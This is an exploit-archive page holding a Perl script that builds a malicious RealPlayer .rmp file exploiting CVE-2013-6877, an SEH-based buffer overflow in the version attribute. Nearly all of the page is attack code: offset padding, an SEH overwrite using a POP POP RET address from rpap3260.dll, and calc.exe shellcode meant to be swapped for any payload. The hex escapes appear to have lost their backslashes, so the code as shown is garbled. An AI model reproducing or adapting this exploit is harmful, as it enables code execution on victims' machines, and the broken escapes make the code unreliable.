Home / exploits

PDF

RealNetworks RealPlayer 16 Buffer Overflow

Posted on 26 December 2013

#!/usr/bin/perl

#-----------------------------------------------------------------------------#
# Exploit Title: RealNetworks RealPlayer Version Attribute Buffer Overflow #
# Date: Dec 20, 2013 #
# Exploit Author: Gabor Seljan #
# Vendor Homepage: http://www.real.com #
# Software Link: http://www.oldapps.com/real.php?old_real_player=12814 #
# Version: 16.0.3.51 and 16.0.2.32 #
# Tested on: Windows XP SP2/SP3 (NX) #
# CVE: CVE-2013-6877 #
#-----------------------------------------------------------------------------#

use strict;
use warnings;

my $filename = "sploit.rmp";

my $open = "x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22";
my $close = "x22x3fx3ex3b";
my $junk1 = "x41" x 2540; # Offset to SEH when opening via click
my $junk2 = "x41" x 10514; # Offset to SEH when opening via menu
my $nSEH = "xebx06x90x90"; # Overwrite next SEH with JMP (6 bytes)
my $SEH = pack('V',0x641930c8); # POP POP RET from rpap3260.dll (16.0.3.51)
#my $SEH = pack('V',0x63A630B8); # POP POP RET from rpap3260.dll (16.0.2.32)
my $junk3 = "x41" x 17000; # Generate exception

# msfpayload windows/exec CMD=calc.exe
my $shellcode = "xb8x2fx9exa9x6fxdbxdcxd9x74x24xf4x5ax2bxc9xb1".
"x33x83xeaxfcx31x42x0ex03x6dx90x4bx9ax8dx44x02x65x6dx95x75".
"xefx88xa4xa7x8bxd9x95x77xdfx8fx15xf3x8dx3bxadx71x1ax4cx06".
"x3fx7cx63x97xf1x40x2fx5bx93x3cx2dx88x73x7cxfexddx72xb9xe2".
"x2ex26x12x69x9cxd7x17x2fx1dxd9xf7x24x1dxa1x72xfaxeax1bx7c".
"x2ax42x17x36xd2xe8x7fxe7xe3x3dx9cxdbxaax4ax57xafx2dx9bxa9".
"x50x1cxe3x66x6fx91xeex77xb7x15x11x02xc3x66xacx15x10x15x6a".
"x93x85xbdxf9x03x6ex3cx2dxd5xe5x32x9ax91xa2x56x1dx75xd9x62".
"x96x78x0exe3xecx5ex8axa8xb7xffx8bx14x19xffxccxf0xc6xa5x87".
"x12x12xdfxc5x78xe5x6dx70xc5xe5x6dx7bx65x8ex5cxf0xeaxc9x60".
"xd3x4fx25x2bx7exf9xaexf2xeaxb8xb2x04xc1xfexcax86xe0x7ex29".
"x96x80x7bx75x10x78xf1xe6xf5x7exa6x07xdcx1cx29x94xbcxccxcc".
"x1cx26x11x7fx72x75x0axf5x98x79x2fxb1x76x30xe0x3fx49x74x0d".
"x93x42x0cxbfx92xb8x4exbax4axbex99x71x09xf8x14xa9x96x91x7e".
"x7cx77x27x25x7bx38xd6x9bx33xd5xb5x31xe1x66xb7xb4x80xd2xfd".
"x2dxb6x24x43x67x90xb2xbbx47x40x73x3cx3dx97x1cx29xd0xf9x70".
"x4bx78x35x9fx4fx2cxb3x7ax05x87xf6xd3xebx48xb0x89xf7xe2x41".
"x1dx8dxb9x15x04x2bxfcxa8x3axd4x37x7dx19xf8x7ex08xebx21xe1".
"x7bx71x75x05x3fxbbx66x0cx93x3cx8dx98x69xf9x7cx27x70x48x23".
"xd4x84xf5xbex72x4exa8x9bx73x25x41x81xe0x04x40x78x79x43x37".
"x7fx2cx96xb9xbfx74x77x1dx0dx20xfcxb4x91xa9xb8x97x4bx18xe3".
"x49x7dx76x3dx47xbaxb5x14x99xb1x24x83xe2x10xfdx67x7ax4fx35".
"x9fxb6xb3x7dx75x32xe2x4ax86xd5xb2xb7xb0x77x11xe0x12xd1xeb".
"x1cx90x7fx42x7cx2dx92x72x2fx7ax13xc0xd6x76x15x99x70x14x8d".
"x4exbex96xb7x85xffxc1xe1x2dxb0x71x1bxd5x1dx02xe3x04x7bx05".
"xb2x73x03xf8xb4x7ex1axfdxb9x37x42x4bxb3x39xf9x25xb5xa8x3d".
"xbax92x40x4axb6x24x79x27x0cxbbx88xfcx3cx35x97x4fx9bx47x78".
"x15x41x91x66xb1x74x0dxbfxb8x90x28xd4x2axf5x3fx43x93x98x2c".
"x1cxa9x2fx48x9fx67x49x3bxd6";

my $evil = $nSEH.$SEH.$shellcode;

my $sploit = $open.$junk1.$evil.$junk2.$evil.$junk3.$close;

open(FILE, ">$filename") || die "[-]Error:
$!
";
print FILE $sploit;
close(FILE);

print "Exploit file created successfully [$filename]!
";

 

TOP